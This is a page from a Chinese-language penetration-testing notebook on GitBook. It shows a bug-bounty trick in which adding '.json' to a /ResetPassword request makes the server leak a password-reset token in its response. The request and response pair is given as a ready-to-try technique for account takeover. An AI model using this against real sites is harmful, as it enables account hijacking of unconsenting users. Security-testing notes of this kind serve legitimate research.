💿
💿
💿
💿
PENETRATION NOTE
GitHub
搜索文档…
About
Readme
收集信息
初始访问
防御规避
权限提升
文件操作
内网和域
HASH操作
横向移动
权限维持
赏金技巧
TOP系列
一行命令
字典
403 bypass
CMS
favico信息
Github
git和svn
sql注入检测
参数污染
测试是否存在heartbleed漏洞
命令注入Bypass
配置错误的云存储桶
通过.json的信息泄露
未认证的ElasticsearchDB
子域名接管
2FA双因子认证绕过
绕过登录限制
云安全
Redteam红队
由
GitBook
提供支持
通过.json的信息泄露
Request:
GET /ResetPassword HTTP/1.1
{"email":"
[email protected]
"}
Response:
HTTP/1.1 200 OK
Request:
GET /ResetPassword.json HTTP/1.1
{"email":"
[email protected]
"}
Response:
HTTP/1.1 200 OK
{"success":"true","token":"596a96-cc7bf-9108c-d896f-33c44a-edc8a"}
以前
配置错误的云存储桶
下一个
未认证的ElasticsearchDB
最近更新
3mo ago
复制链接